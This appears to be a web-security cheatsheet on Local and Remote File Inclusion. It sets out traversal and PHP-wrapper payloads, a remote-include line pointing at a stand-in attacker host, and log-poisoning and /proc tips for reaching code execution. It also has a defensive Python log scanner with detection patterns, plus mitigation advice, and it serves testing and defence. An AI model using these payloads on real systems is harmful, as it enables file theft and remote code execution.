
File Inclusion (LFI/RFI)

Web cheatsheet — Web application enumeration and exploitation techniques.

Overview

File Inclusion (LFI/RFI) is a vulnerability in which a web application includes a file whose name or path is built from user-supplied input. Local File Inclusion (LFI) occurs when the application includes local files based on that input without proper validation, allowing an attacker to read sensitive files or, when the included content is interpreted as code, to execute it.

RFI (Remote File Inclusion) enables an attacker to include remote files, typically leading to remote code execution.


Key Commands & Payloads

The following payloads are commonly used when testing for or exploiting File Inclusion (LFI/RFI):

../../../etc/passwd
..\\..\\..\\windows\\win.ini
....//....//....//etc/passwd
php://filter/convert.base64-encode/resource=index.php
php://filter/resource=/etc/passwd
data://text/plain;base64,<base64>
../../../var/log/apache2/access.log
http://attacker.com/shell.txt?

Tools & Techniques

Recommended tools and techniques for finding and exploiting File Inclusion (LFI/RFI):

  • Test parameters: file, page, include, template, view, load, read, document, folder, path, module
  • PHP wrappers: php://filter, php://input, data://, expect://
  • Log poisoning: inject PHP into access logs, then include them
  • /proc/self/environ or /proc/self/fd/* for LFI-to-RCE
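As an added defensive example (not part of the original cheatsheet), the following Python scans access-log lines for the payload families and include-style parameter names listed above. It assumes Apache/Nginx combined log format; the log lines at the bottom are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameter names from the cheatsheet that commonly carry include paths.
INCLUDE_PARAMS = {"file", "page", "include", "template", "view", "load",
                  "read", "document", "folder", "path", "module"}

# One regex per payload family from the cheatsheet, matched against the normalised value.
SIGNATURES = {
    "traversal": re.compile(r"\.\./"),
    "php_wrapper": re.compile(r"^(php|data|expect)://", re.I),
    "remote_include": re.compile(r"^(https?|ftp)://", re.I),
    "sensitive_file": re.compile(r"(/etc/passwd|win\.ini|/proc/self/|access\.log)", re.I),
}

def normalise(value: str) -> str:
    """Undo common evasion encodings so the signatures see the effective path."""
    v = unquote(unquote(value))       # %2e%2e%2f and double-encoded %252e variants
    v = v.replace("\\", "/")          # Windows separators count as traversal too
    while "....//" in v:              # ....// collapses to ../ once a naive filter strips ../
        v = v.replace("....//", "../")
    return v

def classify_request(uri: str) -> list[str]:
    """Return the payload families found in include-like query parameters."""
    hits = set()
    for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        if name.lower() in INCLUDE_PARAMS:
            v = normalise(value)
            hits.update(k for k, rx in SIGNATURES.items() if rx.search(v))
    return sorted(hits)

LINE_RX = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_log(lines) -> list[tuple[str, str, list[str]]]:
    """Return (client_ip, uri, families) for every access-log line that matches a family."""
    findings = []
    for line in lines:
        m = LINE_RX.match(line)
        if m and (fams := classify_request(m.group(2))):
            findings.append((m.group(1), m.group(2), fams))
    return findings

SAMPLE_LOG = [  # constructed sample lines, not captured traffic
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=....//....//etc/passwd HTTP/1.1" 200 1024',
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dindex.php HTTP/1.1" 200 2048',
    '203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=http://example.invalid/shell.txt? HTTP/1.1" 500 0',
]
```

Running `scan_log(SAMPLE_LOG)` flags the last three lines; the benign `page=about` request produces no finding because only the named parameters are inspected.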

Prevention & Mitigation

Security recommendations to prevent File Inclusion (LFI/RFI):

  • Avoid dynamic file inclusion based on user input
  • Use a whitelist of allowed files and paths
  • Disable the PHP configuration directives that permit remote inclusion (allow_url_include, allow_url_fopen)
  • Run application with minimal file system permissions
  • Implement proper input validation and sanitization
